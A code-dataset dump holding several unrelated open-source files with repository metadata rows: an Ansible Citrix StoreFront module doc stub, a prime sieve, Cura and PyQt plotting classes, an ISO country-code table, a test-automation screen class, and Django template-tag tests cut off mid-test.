# -*- coding: utf-8 -*-
# <COPYRIGHT>
# <CODEGENMETA>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# this is a windows documentation stub. actual code lives in the .ps1
# file of the same name
DOCUMENTATION = '''
---
module: win_sfstore
version_added:
short_description: Generated from DSC module storefront version 0.9.4 at 07.10.2016 01.23.53
description:
- The Storefront DSC resources can automate the deployment and configuration of Citrix Storefront 3.5. These DSC resources are provided AS IS, and are not supported through any means.
options:
AuthenticationServiceVirtualPath:
description:
-
required: True
default:
aliases: []
VirtualPath:
description:
-
required: True
default:
aliases: []
Ensure:
description:
-
required: False
default:
aliases: []
choices:
- Absent
- Present
FriendlyName:
description:
-
required: False
default:
aliases: []
PsDscRunAsCredential_username:
description:
-
required: False
default:
aliases: []
PsDscRunAsCredential_password:
description:
-
required: False
default:
aliases: []
SiteId:
description:
-
required: False
default:
aliases: []
AutoInstallModule:
description:
- If true, the required dsc resource/module will be auto-installed using the Powershell package manager
required: False
default: false
aliases: []
choices:
- true
- false
AutoConfigureLcm:
description:
- If true, LCM will be auto-configured for directly invoking DSC resources (which is a one-time requirement for Ansible DSC modules)
required: False
default: false
aliases: []
choices:
- true
        - false
'''
| [
"[email protected]"
] | |
abf55a6e89c418a0d6cb8142f1025f77d7a05d97 | 3879d1ca43c573c209f962182cd1e7f7fe978fbf | /binarysearch/Generate-Primes/Generate-Primes.py | 732a67fc393a9520ae82b86615fcb9d57bfa042b | [] | no_license | DoctorLai/ACM | 34a5600a5adf22660c5d81b2d8b7a358be537ecf | aefa170f74c55c1230eb6f352770512b1e3f469e | refs/heads/master | 2023-09-01T02:13:01.604508 | 2023-08-31T15:42:07 | 2023-08-31T15:42:07 | 146,173,024 | 62 | 18 | null | 2020-10-11T13:19:57 | 2018-08-26T11:00:36 | C++ | UTF-8 | Python | false | false | 538 | py |
# https://helloacm.com/teaching-kids-programmaing-generate-prime-numbers-using-sieve-of-eratosthenes-algorithms/
# https://binarysearch.com/problems/Generate-Primes
# EASY, MATH
class Solution:
def solve(self, n):
isPrimes = [False] * 2 + [True] * (n - 1)
i = 2
while i * i <= n:
if isPrimes[i]:
j = i + i
while j <= n:
isPrimes[j] = False
j += i
i += 1
return [x for x in range(1, n + 1) if isPrimes[x]]
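# Editor's sanity check (not in the original file): the sieve above should
# return every prime up to n, e.g.
assert Solution().solve(10) == [2, 3, 5, 7]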
| [
"[email protected]"
] | |
7e9bc8c8ada0baa06ab47fa561af1ba9a1656353 | 4e96f383d4703ad8ee58869ed91a0c8432c8a051 | /Cura/Uranium/UM/Scene/GroupDecorator.py | 683f4d0b12d57e068187742b233f7f8283baa708 | [
"GPL-3.0-only",
"LGPL-3.0-only"
] | permissive | flight7788/3d-printing-with-moveo-1 | b2dba26010c4fa31815bc1d2d0966161a8600081 | 7fcb9c6b5da9245d54ac917de8c2a7f5148e42b0 | refs/heads/Feature_Marlin_with_AlanBoy | 2022-08-30T18:36:44.785058 | 2020-05-30T07:52:58 | 2020-05-30T07:52:58 | 212,583,912 | 0 | 0 | MIT | 2020-05-16T07:39:47 | 2019-10-03T13:13:01 | C | UTF-8 | Python | false | false | 1,777 | py |
from UM.Scene.SceneNodeDecorator import SceneNodeDecorator
from UM.Scene.Selection import Selection
from typing import TYPE_CHECKING, Optional
if TYPE_CHECKING:
from UM.Scene.SceneNode import SceneNode
class GroupDecorator(SceneNodeDecorator):
def __init__(self, remove_when_empty: bool = True) -> None:
super().__init__()
# Used to keep track of previous parent when an empty group removes itself from the scene.
# We keep this option so that it's possible to undo it.
self._old_parent = None # type: Optional[SceneNode]
self._remove_when_empty = remove_when_empty
def setNode(self, node: "SceneNode") -> None:
super().setNode(node)
if self._node is not None:
self._node.childrenChanged.connect(self._onChildrenChanged)
def isGroup(self) -> bool:
return True
def getOldParent(self) -> Optional["SceneNode"]:
return self._old_parent
def _onChildrenChanged(self, node: "SceneNode") -> None:
if self._node is None:
return
if not self._remove_when_empty:
return
if not self._node.hasChildren():
# A group that no longer has children may remove itself from the scene
self._old_parent = self._node.getParent()
self._node.setParent(None)
Selection.remove(self._node)
else:
# A group that has removed itself from the scene because it had no children may add itself back to the scene
# when a child is added to it.
if not self._node.getParent() and self._old_parent:
self._node.setParent(self._old_parent)
self._old_parent = None
def __deepcopy__(self, memo):
        return GroupDecorator()
| [
"[email protected]"
] | |
2f9bce858147dcf1996bd5661690506c4d32d259 | d7fe33ef0959cf8d319db5e8c9d08b22ac100f50 | /04_tavli/main/iso.py | 0702a8fc0b4e479c0242e8db766984c6c5095ffb | [
"MIT"
] | permissive | georstef/GoogleAppEngine | 79aaa3a969457ea318c4d5e50258d7b424dff7cc | 008845ec768926513b1e5219267ea12e184cf3be | refs/heads/master | 2020-04-20T21:34:29.654551 | 2014-08-03T11:07:04 | 2014-08-03T11:07:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,179 | py |
# coding: utf-8
ISO_3166 = {
'AF': 'Afghanistan',
'AX': 'Åland Islands',
'AL': 'Albania',
'DZ': 'Algeria',
'AS': 'American Samoa',
'AD': 'Andorra',
'AO': 'Angola',
'AI': 'Anguilla',
'AQ': 'Antarctica',
'AG': 'Antigua and Barbuda',
'AR': 'Argentina',
'AM': 'Armenia',
'AW': 'Aruba',
'AU': 'Australia',
'AT': 'Austria',
'AZ': 'Azerbaijan',
'BS': 'Bahamas',
'BH': 'Bahrain',
'BD': 'Bangladesh',
'BB': 'Barbados',
'BY': 'Belarus',
'BE': 'Belgium',
'BZ': 'Belize',
'BJ': 'Benin',
'BM': 'Bermuda',
'BT': 'Bhutan',
'BO': 'Bolivia',
'BQ': 'Bonaire',
'BA': 'Bosnia and Herzegovina',
'BW': 'Botswana',
'BV': 'Bouvet Island',
'BR': 'Brazil',
'IO': 'British Indian Ocean Territory',
'BN': 'Brunei Darussalam',
'BG': 'Bulgaria',
'BF': 'Burkina Faso',
'BI': 'Burundi',
'KH': 'Cambodia',
'CM': 'Cameroon',
'CA': 'Canada',
'CV': 'Cape Verde',
'KY': 'Cayman Islands',
'CF': 'Central African Republic',
'TD': 'Chad',
'CL': 'Chile',
'CN': 'China',
'CX': 'Christmas Island',
'CC': 'Cocos (Keeling) Islands',
'CO': 'Colombia',
'KM': 'Comoros',
'CG': 'Congo',
'CD': 'Congo, the Democratic Republic of the',
'CK': 'Cook Islands',
'CR': 'Costa Rica',
'CI': "Côte d'Ivoire",
'HR': 'Croatia',
'CU': 'Cuba',
'CW': 'Curaçao',
'CY': 'Cyprus',
'CZ': 'Czech Republic',
'DK': 'Denmark',
'DJ': 'Djibouti',
'DM': 'Dominica',
'DO': 'Dominican Republic',
'EC': 'Ecuador',
'EG': 'Egypt',
'SV': 'El Salvador',
'GQ': 'Equatorial Guinea',
'ER': 'Eritrea',
'EE': 'Estonia',
'ET': 'Ethiopia',
'FK': 'Falkland Islands (Malvinas)',
'FO': 'Faroe Islands',
'FJ': 'Fiji',
'FI': 'Finland',
'FR': 'France',
'GF': 'French Guiana',
'PF': 'French Polynesia',
'TF': 'French Southern Territories',
'GA': 'Gabon',
'GM': 'Gambia',
'GE': 'Georgia',
'DE': 'Germany',
'GH': 'Ghana',
'GI': 'Gibraltar',
'GR': 'Greece',
'GL': 'Greenland',
'GD': 'Grenada',
'GP': 'Guadeloupe',
'GU': 'Guam',
'GT': 'Guatemala',
'GG': 'Guernsey',
'GN': 'Guinea',
'GW': 'Guinea-Bissau',
'GY': 'Guyana',
'HT': 'Haiti',
'HM': 'Heard Island and McDonald Islands',
'VA': 'Holy See (Vatican City State)',
'HN': 'Honduras',
'HK': 'Hong Kong',
'HU': 'Hungary',
'IS': 'Iceland',
'IN': 'India',
'ID': 'Indonesia',
'IR': 'Iran',
'IQ': 'Iraq',
'IE': 'Ireland',
'IM': 'Isle of Man',
'IL': 'Israel',
'IT': 'Italy',
'JM': 'Jamaica',
'JP': 'Japan',
'JE': 'Jersey',
'JO': 'Jordan',
'KZ': 'Kazakhstan',
'KE': 'Kenya',
'KI': 'Kiribati',
'KP': 'North Korea',
'KR': 'South Korea',
'KW': 'Kuwait',
'KG': 'Kyrgyzstan',
'LA': "Lao People's Democratic Republic",
'LV': 'Latvia',
'LB': 'Lebanon',
'LS': 'Lesotho',
'LR': 'Liberia',
'LY': 'Libya',
'LI': 'Liechtenstein',
'LT': 'Lithuania',
'LU': 'Luxembourg',
'MO': 'Macao',
'MK': 'Macedonia, the former Yugoslav Republic of',
'MG': 'Madagascar',
'MW': 'Malawi',
'MY': 'Malaysia',
'MV': 'Maldives',
'ML': 'Mali',
'MT': 'Malta',
'MH': 'Marshall Islands',
'MQ': 'Martinique',
'MR': 'Mauritania',
'MU': 'Mauritius',
'YT': 'Mayotte',
'MX': 'Mexico',
'FM': 'Micronesia, Federated States of',
'MD': 'Moldova',
'MC': 'Monaco',
'MN': 'Mongolia',
'ME': 'Montenegro',
'MS': 'Montserrat',
'MA': 'Morocco',
'MZ': 'Mozambique',
'MM': 'Myanmar',
'NA': 'Namibia',
'NR': 'Nauru',
'NP': 'Nepal',
'NL': 'Netherlands',
'NC': 'New Caledonia',
'NZ': 'New Zealand',
'NI': 'Nicaragua',
'NE': 'Niger',
'NG': 'Nigeria',
'NU': 'Niue',
'NF': 'Norfolk Island',
'MP': 'Northern Mariana Islands',
'NO': 'Norway',
'OM': 'Oman',
'PK': 'Pakistan',
'PW': 'Palau',
'PS': 'Palestine, State of',
'PA': 'Panama',
'PG': 'Papua New Guinea',
'PY': 'Paraguay',
'PE': 'Peru',
'PH': 'Philippines',
'PN': 'Pitcairn',
'PL': 'Poland',
'PT': 'Portugal',
'PR': 'Puerto Rico',
'QA': 'Qatar',
'RE': 'Réunion',
'RO': 'Romania',
'RU': 'Russia',
'RW': 'Rwanda',
'BL': 'Saint Barthélemy',
'SH': 'Saint Helena, Ascension and Tristan da Cunha',
'KN': 'Saint Kitts and Nevis',
'LC': 'Saint Lucia',
'MF': 'Saint Martin (French part)',
'PM': 'Saint Pierre and Miquelon',
'VC': 'Saint Vincent and the Grenadines',
'WS': 'Samoa',
'SM': 'San Marino',
'ST': 'Sao Tome and Principe',
'SA': 'Saudi Arabia',
'SN': 'Senegal',
'RS': 'Serbia',
'SC': 'Seychelles',
'SL': 'Sierra Leone',
'SG': 'Singapore',
'SX': 'Sint Maarten (Dutch part)',
'SK': 'Slovakia',
'SI': 'Slovenia',
'SB': 'Solomon Islands',
'SO': 'Somalia',
'ZA': 'South Africa',
'GS': 'South Georgia and the South Sandwich Islands',
'SS': 'South Sudan',
'ES': 'Spain',
'LK': 'Sri Lanka',
'SD': 'Sudan',
'SR': 'Suriname',
'SJ': 'Svalbard and Jan Mayen',
'SZ': 'Swaziland',
'SE': 'Sweden',
'CH': 'Switzerland',
'SY': 'Syrian Arab Republic',
'TW': 'Taiwan',
'TJ': 'Tajikistan',
'TZ': 'Tanzania, United Republic of',
'TH': 'Thailand',
'TL': 'Timor-Leste',
'TG': 'Togo',
'TK': 'Tokelau',
'TO': 'Tonga',
'TT': 'Trinidad and Tobago',
'TN': 'Tunisia',
'TR': 'Turkey',
'TM': 'Turkmenistan',
'TC': 'Turks and Caicos Islands',
'TV': 'Tuvalu',
'UG': 'Uganda',
'UA': 'Ukraine',
'AE': 'United Arab Emirates',
'GB': 'United Kingdom',
'US': 'United States',
'UM': 'United States Minor Outlying Islands',
'UY': 'Uruguay',
'UZ': 'Uzbekistan',
'VU': 'Vanuatu',
'VE': 'Venezuela',
'VN': 'Vietnam',
'VG': 'Virgin Islands, British',
'VI': 'Virgin Islands, U.S.',
'WF': 'Wallis and Futuna',
'EH': 'Western Sahara',
'YE': 'Yemen',
'ZM': 'Zambia',
'ZW': 'Zimbabwe',
}
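# Editor's usage note (assumed): ISO codes index directly into the mapping,
# e.g. ISO_3166['GR'] == 'Greece'.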
| [
"[email protected]"
] | |
adaf1da2130a33488620aa75caf973fd545999c8 | 3365e4d4fc67bbefe4e8c755af289c535437c6f4 | /.history/src/core/dialogs/waterfall_dialog_20170816111635.py | a04802520a5bea5ee054bf9af320a163c394bcc6 | [] | no_license | kiranhegde/OncoPlotter | f3ab9cdf193e87c7be78b16501ad295ac8f7d2f1 | b79ac6aa9c6c2ca8173bc8992ba3230aa3880636 | refs/heads/master | 2021-05-21T16:23:45.087035 | 2017-09-07T01:13:16 | 2017-09-07T01:13:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,845 | py |
'''
Refs:
Embedding plot: https://sukhbinder.wordpress.com/2013/12/16/simple-pyqt-and-matplotlib-example-with-zoompan/
'''
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar
import matplotlib.pyplot as plt
from PyQt5.QtWidgets import (QColorDialog, QHeaderView, QApplication, QDialog, QWidget, QPushButton, QVBoxLayout, QTreeWidget, QTreeWidgetItem, QComboBox)
from PyQt5 import QtCore, QtGui
import core.gui.waterfall as waterfall
import numpy as np
import shelve
from pprint import pprint
class CustomCombo(QComboBox):
def __init__(self,parent,bar_keys_colors,response_type):
super(QComboBox,self).__init__(parent)
#keys is a dictionary: {'key description':color,...}
self.dict_of_keys = bar_keys_colors
self.response_type = response_type
self.populate()
def populate(self):
'''Override method to add items to list'''
for key in list(self.dict_of_keys.keys()):
self.pixmap = QtGui.QPixmap(20,20)
self.pixmap.fill(QtGui.QColor(self.dict_of_keys[key]))
self.color_icon = QtGui.QIcon(self.pixmap)
self.addItem(self.color_icon,key)
self.setCurrentIndex(self.findText(self.response_type,flags=QtCore.Qt.MatchContains)) #default to the patient cancer type
class Waterfall(QWidget, waterfall.Ui_Waterfall):
plot_settings_signal = QtCore.pyqtSignal(list) #send list of plotting params
updated_rectangles_signal = QtCore.pyqtSignal(list) #send list of updated artists for redrawing
def __init__(self, parent):
super(Waterfall,self).__init__(parent)
self.setupUi(self)
self.get_settings()
self.send_settings()
#Button functions
self.btn_apply_general_settings.clicked.connect(self.send_settings)
self.btn_apply_keys_and_colors_settings.clicked.connect(self.send_settings)
self.patient_tree = self.create_patient_tree()
self.data_viewer_container.addWidget(self.patient_tree)
self.btn_color_test.clicked.connect(self.get_color)
def get_color(self):
        self.color = QColorDialog.getColor()  # returns a QColor object
        print(self.color)
def get_settings(self):
try:
with shelve.open('WaterfallSettings') as shelfFile:
self.keys_and_colors = shelfFile['keys_and_colors']
shelfFile.close()
except:
#set and use default settings
self.keys_and_colors = {
'CR':'#03945D',
'PR':'#B1EE97',
'PD':'#FF6F69',
'SD':'#707070'}
with shelve.open('WaterfallSettings') as shelfFile:
shelfFile['keys_and_colors'] = self.keys_and_colors
shelfFile.close()
def on_waterfall_data_signal(self,signal):
self.waterfall_data = signal['waterfall_data'] #pandas dataframe
def on_generated_rectangles_signal(self,signal):
self.rectangles_received = signal[0]
self.add_items() #display in table
def send_settings(self):
'''
Emit both general plot settings, and color labeling settings. These are the settings to be used when the plot is created.
'''
self.general_settings = [
self.plot_title.text(),
self.x_label.text(),
self.y_label.text(),
[self.twenty_percent_line.isChecked(),
self.thirty_percent_line.isChecked(),
self.zero_percent_line.isChecked()],
[self.display_responses_as_text.isChecked(),
self.display_responses_as_color.isChecked(),
self.display_no_responses.isChecked()],
self.include_table.isChecked()
]
self.plot_settings_signal.emit(self.general_settings)
def create_patient_tree(self):
'''
Create QTreeWidget populated with a patient's data for the DataEntry dialog.
Assumes that self.temp_patient is the patient of interest and that the variable belongs to the dialog.
'''
self.tree = QTreeWidget()
self.root = self.tree.invisibleRootItem()
self.headers = [
'Patient #',
'Best response %',
'Response',
'Cancer',
'Color key',
]
self.headers_item = QTreeWidgetItem(self.headers)
self.tree.setColumnCount(len(self.headers))
self.tree.setHeaderItem(self.headers_item)
self.root.setExpanded(True)
self.tree.header().setSectionResizeMode(QHeaderView.ResizeToContents)
self.tree.header().setStretchLastSection(False)
return self.tree
def add_items(self):
'''
Populate viewing tree
'''
self.tree.clear() #clear prior to entering items, prevent aggregation
i=0
for rect in self.rectangles_received:
#populate editable tree with rect data
self.rect_item = QTreeWidgetItem(self.root)
self.rect_params = [
self.waterfall_data['Patient number'][i],
rect.get_height(),
self.waterfall_data['Overall response'][i],
self.waterfall_data['Cancer'][i]
]
for col in range(0,4):
self.rect_item.setText(col,str(self.rect_params[col]))
self.rect_item.setTextAlignment(col,4)
self.tree.setItemWidget(self.rect_item, 4, CustomCombo(self,self.keys_and_colors,self.waterfall_data['Overall response'][i]))
self.rect_item.setFlags(self.rect_item.flags() | QtCore.Qt.ItemIsEditable)
i+=1
def on_updated_tree_item(self):
#update the rectangle which was edited
pass
class WaterfallPlotter(QWidget):
generated_rectangles_signal = QtCore.pyqtSignal(list) #send list of rects for data display in tree
def __init__(self,parent):
super(WaterfallPlotter,self).__init__(parent)
self.get_settings()
self.settings_update = False
self.figure = plt.figure()
self.canvas = FigureCanvas(self.figure)
self.toolbar = NavigationToolbar(self.canvas,self)
self.btn_plot = QPushButton('Default Plot')
self.btn_plot.clicked.connect(self.default_plot)
self.layout = QVBoxLayout()
self.layout.addWidget(self.toolbar)
self.layout.addWidget(self.canvas)
self.layout.addWidget(self.btn_plot)
self.setLayout(self.layout)
def on_waterfall_data_signal(self,signal):
self.waterfall_data = signal['waterfall_data'] #pandas dataframe
self.btn_plot.setEnabled(True)
self.btn_apply_general_settings.setEnabled(True)
def get_settings(self):
try:
with shelve.open('WaterfallSettings') as shelfFile:
self.keys_and_colors = shelfFile['keys_and_colors']
shelfFile.close()
except:
#set and use default settings
self.keys_and_colors = {
'CR':'#03945D',
'PR':'#B1EE97',
'PD':'#FF6F69',
'SD':'#707070'}
with shelve.open('WaterfallSettings') as shelfFile:
shelfFile['keys_and_colors'] = self.keys_and_colors
shelfFile.close()
def on_general_settings_signal(self,signal):
self.gen_settings = signal
self.settings_update = True
try:
hasattr(self,'ax')
self.ax.set_title(self.gen_settings[0])
self.ax.set_xlabel(self.gen_settings[1])
self.ax.set_ylabel(self.gen_settings[2])
self.canvas.draw()
except Exception as e:
print(e)
self.default_plot()
def bar_colors(self,responses):
return [self.keys_and_colors[x] for x in responses]
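    # Editor's note: with the default key map above this turns a list of
    # responses into hex colours, e.g. ['CR', 'PD'] -> ['#03945D', '#FF6F69'].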
def default_plot(self):
'''
Plot waterfall data
'''
self.figure.clear()
self.rect_locations = np.arange(len(self.waterfall_data['Best response percent change']))
self.ax = self.figure.add_subplot(111)
if self.settings_update == False:
self.ax.axhline(y=20, linestyle='--', c='k', alpha=0.5, lw=2.0, label='twenty_percent')
self.ax.axhline(y=-30, linestyle='--', c='k', alpha=0.5, lw=2.0, label='thirty_percent')
self.ax.axhline(y=0, c='k', alpha=1, lw=2.0, label='zero_percent')
self.ax.grid(color = 'k', axis = 'y', alpha=0.25)
            # use a local name so the bar_colors() helper is not overwritten
            bar_colors = self.bar_colors(self.waterfall_data['Overall response'])
            self.rects = self.ax.bar(self.rect_locations, self.waterfall_data['Best response percent change'], color=bar_colors)
else:
#settings were updated, we received them and stored in variable self.gen_settings
if self.gen_settings[3][0]:
self.ax.axhline(y=20, linestyle='--', c='k', alpha=0.5, lw=2.0, label='twenty_percent')
if self.gen_settings[3][1]:
self.ax.axhline(y=-30, linestyle='--', c='k', alpha=0.5, lw=2.0, label='thirty_percent')
if self.gen_settings[3][2]:
self.ax.axhline(y=0, c='k', alpha=1, lw=2.0, label='zero_percent')
if self.gen_settings[4][0]:
#show responses as labels, default color bars
self.rects = self.ax.bar(self.rect_locations, self.waterfall_data['Best response percent change'])
self.auto_label_responses(self.ax, self.rects, self.waterfall_data)
elif self.gen_settings[4][1]:
                # use a local name so the bar_colors() helper is not overwritten
                bar_colors = self.bar_colors(self.waterfall_data['Overall response'])
                self.rects = self.ax.bar(self.rect_locations, self.waterfall_data['Best response percent change'], color=bar_colors)
else:
self.rects = self.ax.bar(self.rect_locations, self.waterfall_data['Best response percent change'])
if self.gen_settings[5]:
self.plot_table()
self.ax.grid(color = 'k', axis = 'y', alpha=0.25)
self.canvas.draw()
self.ax.hold(False) #rewrite the plot when plot() called
self.generated_rectangles_signal.emit([self.rects])
def plot_table(self):
rows = ['%s' % x for x in self.waterfall_data.keys()]
rows = rows[4:] #skip first three, they are the 4 standard headers, rest are table rows
columns = self.waterfall_data['Patient number'] #patient numbers
cell_text = []
for row in rows:
cell_text_temp = []
for col in range(len(columns)):
cell_text_temp.append(self.waterfall_data[row][col])
cell_text.append(cell_text_temp)
the_table = plt.table(cellText=cell_text, rowLabels=rows, colLabels=columns, loc='bottom', cellLoc='center')
plt.subplots_adjust(bottom=0.15,left=0.5)
self.ax.set_xlim(-0.5,len(columns)-0.5)
plt.tick_params(
axis='x', # changes apply to the x-axis
which='both', # both major and minor ticks are affected
bottom='off', # ticks along the bottom edge are off
top='off', # ticks along the top edge are off
labelbottom='off'
) # labels along the bottom edge are off
def update_plot(self):
'''
TODO
'''
pass
def auto_label_responses(self, ax, rects, waterfall_data):
'''Add labels above/below bars'''
i = 0
for rect in rects:
height = rect.get_height()
if height >= 0:
valign = 'bottom'
else:
valign = 'top'
ax.text(rect.get_x() + rect.get_width()/2., height,
'%s' % waterfall_data['Overall response'][i], ha='center', va=valign)
i+=1
| [
"[email protected]"
] | |
85566a279360d8fee75c2ed3b6a5c4fe6426afc1 | 30d360f965253167c99f9b4cd41001491aed08af | /PTFE_code/integrate_profile.py | 4ba0587d6305af16574d6b5b2d36c2e9a6d5dba3 | [] | no_license | petervanya/PhDcode | d2d9f7170f201d6175fec9c3d4094617a5427fb5 | 891e6812a2699025d26b901c95d0c46a706b0c96 | refs/heads/master | 2020-05-22T06:43:47.293134 | 2018-01-29T12:59:42 | 2018-01-29T12:59:42 | 64,495,043 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,856 | py | #!/usr/bin/env python
"""Usage: integrate_profile.py <profile> <d> [--L <L>]
[AD HOC] Load 1d water profile and integrate
volume of water in polymer and in electrodes.
Arguments:
<file> Water profile, columns [r, f]
<d> Slab width in nm
Options:
--L <L> Box size in DPD units [default: 40]
09/11/16
"""
import numpy as np
from scipy.integrate import simps
import sys
from docopt import docopt
rc = 8.14e-10
if __name__ == "__main__":
args = docopt(__doc__)
L = float(args["--L"])
d_nm = float(args["<d>"])
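    # Editor's note: convert the slab width from nm to DPD reduced units via
    # the length scale rc defined above.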
d = d_nm * 1e-9 / rc
try:
A = np.loadtxt(args["<profile>"])
except FileNotFoundError:
sys.exit("No file found: %s." % args["<profile>"])
r, f = A[:, 0], A[:, 1]
if d < 0.0 or d > L:
sys.exit("Slab width larger than box size.")
print("===== Integrating water profile =====")
print("L: %.2f | slab width: %.2f (%.2f nm)" % (L, d, d_nm))
dr = r[1] - r[0]
re1 = r[r < (L-d)/2]
re2 = r[r > (L+d)/2]
rm = r[(r >= (L-d)/2) & (r <= (L+d)/2)]
fe1 = f[r < (L-d)/2]
fe2 = f[r > (L+d)/2]
fm = f[(r >= (L-d)/2) & (r <= (L+d)/2)]
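    # Editor's note: integrate each region with Simpson's rule on the uniform
    # grid (spacing dr): the film slab plus the two electrode regions.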
water_film = simps(fm, dx=dr)
water_elec = simps(fe1, dx=dr) + simps(fe2, dx=dr)
water_tot = simps(f, dx=dr)
print("Total water: %.2f" % water_tot)
print("Electrodes: %.2f | Film: %.2f | mat / el: %.2f" % \
(water_elec, water_film, water_film / water_elec))
R = water_film / (water_film + water_elec)
print("Ratio of water in the film: %.2f" % R)
# water_film = np.sum(fm) * dr
# water_elec = (np.sum(fe1) + np.sum(fe2)) * dr
# water_tot = np.sum(f) * dr
#
# print("Naive quadrature | Total water: %.2f" % water_tot)
# print("Electrodes: %.2f | Matrix: %.2f | mat / el: %.2f" % \
# (water_elec, water_film, water_film / water_elec))
| [
"[email protected]"
] | |
0bea389e510b7977e448170db9a97655fd4abd53 | 7b4e9342d42be2b55af5dc23a8abedd672d68e99 | /MobileApps/libs/flows/mac/smart/screens/printersettings/printer_from_other_devices.py | 96ab7c3b1a277a1e82cb0c00364ddd13f515ba52 | [] | no_license | Amal548/QAMA | af5bb335c92a90b461f1ee9a3870435d83d46802 | b5230c51d3bc7bb04b3448d1a1fe5a076d8898d5 | refs/heads/master | 2023-07-12T09:17:04.624677 | 2021-08-06T08:01:11 | 2021-08-06T08:01:11 | 389,595,655 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,596 | py | # encoding: utf-8
'''
Description: Defines the element operations and verification methods for the
"print from other devices" screen.
@author: Sophia
@create_date: Sep 18, 2019
'''
import logging
from MobileApps.libs.flows.mac.smart.screens.smart_screens import SmartScreens
from MobileApps.libs.flows.mac.smart.screens.printersettings.printer_setting_scroll import PrinterSettingScroll
class PrinterFromOtherDevices(PrinterSettingScroll, SmartScreens):
folder_name = "printersettings"
flow_name = "print_from_other_devices"
def __init__(self, driver):
'''
        Initializer for the class.
:parameter:
:return:
'''
super(PrinterFromOtherDevices, self).__init__(driver)
# -------------------------------Operate Elements------------------------------
def wait_for_screen_load(self, timeout=30, raise_e=True):
'''
        Wait for the "print from other devices" screen to load correctly.
:parameter:
:return:
'''
logging.debug("[PrinterFromOtherDevices]:[wait_for_screen_load]-Wait for screen loading... ")
return self.driver.wait_for_object("send_link_btn", timeout=timeout, raise_e=raise_e)
def click_send_link_btn(self):
'''
This is a method to click send link button.
:parameter:
:return:
'''
logging.debug("[PrinterFromOtherDevices]:[click_send_link_btn]-Click send link button... ")
self.driver.click("send_link_btn")
# -------------------------------Verification Methods--------------------------
| [
"[email protected]"
] | |
965136bc0b42a3aabe975b1fa258634b2f69fa3e | 395ebd49c4f3a083369406f1cdcb89cfb79fa57f | /tests/core/test_templatetags.py | 76c80869a6d716dc37f8963d8da04fb543a6c65a | [
"MIT"
] | permissive | philgyford/django-spectator | dbf76d93d1ccce9225c4a907c368f6e2cc4462c1 | 2d89dcdb624b01452a5b6ca0ee092774fcc0aa52 | refs/heads/main | 2023-07-24T06:43:13.846287 | 2023-07-11T14:16:34 | 2023-07-11T14:16:34 | 83,340,861 | 45 | 9 | MIT | 2023-07-11T09:48:16 | 2017-02-27T18:04:48 | Python | UTF-8 | Python | false | false | 9,851 | py | from unittest.mock import Mock, patch
from django.http import QueryDict
from django.test import TestCase
from spectator.core.apps import Apps
from spectator.core.factories import IndividualCreatorFactory
from spectator.core.templatetags.spectator_core import (
change_object_link_card,
domain_urlize,
get_enabled_apps,
get_item,
most_read_creators,
most_read_creators_card,
most_visited_venues,
most_visited_venues_card,
query_string,
)
from spectator.events.factories import MiscEventFactory, VenueFactory
from spectator.reading.factories import (
PublicationFactory,
PublicationRoleFactory,
ReadingFactory,
)
from .. import make_date
class GetEnabledAppsTestCase(TestCase):
@patch.object(Apps, "all")
def test_results(self, patched_all):
# all() will return an app that is not installed:
patched_all.return_value = ["events", "reading", "NOPE"]
# So 'NOPE' shouldn't be returned here:
enabled_apps = get_enabled_apps()
self.assertEqual(2, len(enabled_apps))
self.assertEqual(enabled_apps[0], "events")
self.assertEqual(enabled_apps[1], "reading")
class GetItemTestCase(TestCase):
    def test_key(self):
        d = {"a": 1}  # renamed from `dict` to avoid shadowing the built-in
        self.assertEqual(get_item(d, "a"), 1)

    def test_key_none(self):
        d = {"a": 1}
        self.assertIsNone(get_item(d, "b"))
class DomainUrlizeTestCase(TestCase):
def test_domain_urlize(self):
self.assertEqual(
domain_urlize("http://www.example.org/foo/"),
'<a href="http://www.example.org/foo/" rel="nofollow">example.org</a>',
)
class ChangeObjectLinkCardTestCase(TestCase):
def test_output_can_change(self):
creator = IndividualCreatorFactory(pk=5)
perms = ["spectator.can_edit_creator"]
result = change_object_link_card(creator, perms)
self.assertTrue(result["display_link"])
self.assertEqual(
result["change_url"], "/admin/spectator_core/creator/5/change/"
)
class QueryStringTestCase(TestCase):
def test_adds_arg(self):
"It adds your key/value to the existing GET string."
context = {"request": Mock(GET=QueryDict("a=1"))}
self.assertIn(
query_string(context, "foo", "bar"), ["foo=bar&a=1", "a=1&foo=bar"]
)
def test_replaces_arg(self):
"It replaces an existing GET arg with what you supply."
context = {"request": Mock(GET=QueryDict("a=1"))}
self.assertEqual(query_string(context, "a", "bar"), "a=bar")
def test_handles_missing_request(self):
"If there's no request object, it doesn't complain."
context = {}
self.assertEqual(query_string(context, "foo", "bar"), "foo=bar")
def test_urlencodes(self):
"It URL-encodes the returned string."
context = {"request": Mock(GET=QueryDict("a=1"))}
self.assertIn(
query_string(context, "foo", "bar&bar"),
["foo=bar%26bar&a=1", "a=1&foo=bar%26bar"],
)
class MostReadCreatorsTestCase(TestCase):
def test_returns_queryset(self):
"It should return 10 items by default."
d = make_date("2017-02-15")
for i in range(11):
c = IndividualCreatorFactory()
pub = PublicationFactory()
PublicationRoleFactory(publication=pub, creator=c, role_name="")
ReadingFactory(publication=pub, start_date=d, end_date=d, is_finished=True)
creators = most_read_creators()
self.assertEqual(len(creators), 10)
def test_num(self):
"It should return `num` items."
d = make_date("2017-02-15")
for i in range(4):
c = IndividualCreatorFactory()
pub = PublicationFactory()
PublicationRoleFactory(publication=pub, creator=c, role_name="")
ReadingFactory(publication=pub, start_date=d, end_date=d, is_finished=True)
creators = most_read_creators(num=3)
self.assertEqual(len(creators), 3)
def test_finished(self):
"It should only return finished readings"
d = make_date("2017-02-15")
# A finished reading
